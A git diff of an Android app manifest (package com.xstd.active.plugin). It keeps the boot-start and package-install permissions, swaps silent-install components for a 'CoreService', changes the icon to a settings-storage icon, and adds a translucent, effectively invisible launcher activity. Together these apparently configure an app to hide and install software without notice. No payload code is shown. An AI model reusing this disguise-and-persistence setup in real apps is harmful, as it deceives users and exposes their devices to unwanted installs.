--- a/app/AndroidManifest.xml
+++ b/app/AndroidManifest.xml
@@ -7,26 +7,20 @@
     <uses-sdk
         android:minSdkVersion="14"
         android:targetSdkVersion="19" />
-
+    
     <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
     <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
     <uses-permission android:name="android.permission.INTERNET" />
+    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
 
     <application
         android:allowBackup="true"
-        android:icon="@drawable/ic_launcher"
+        android:icon="@drawable/ic_settings_storage"
         android:label="@string/app_name"
         android:theme="@style/AppTheme" >
-        <receiver android:name="com.xstd.active.plugin.SilentInstallReceiver" >
-            <intent-filter>
-                <action android:name="com.xstd.activeplugin.SilentInstall" />
 
-                <category android:name="android.intent.category.DEFAULT" />
-            </intent-filter>
-        </receiver>
-
-        <service android:name="com.xstd.active.plugin.SilentInstallService" />
+        <service android:name="com.xstd.active.plugin.CoreService" />
 
         <receiver android:name="com.xstd.active.plugin.BootCompleteReceiver" >
             <intent-filter>
@@ -35,6 +29,12 @@
                 <category android:name="android.intent.category.DEFAULT" />
             </intent-filter>
         </receiver>
+        <activity android:name=".MainActivity" android:theme="@android:style/Theme.Translucent">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN"/>
+                <category android:name="android.intent.category.LAUNCHER"/>
+            </intent-filter>
+        </activity>
     </application>
 
 </manifest>
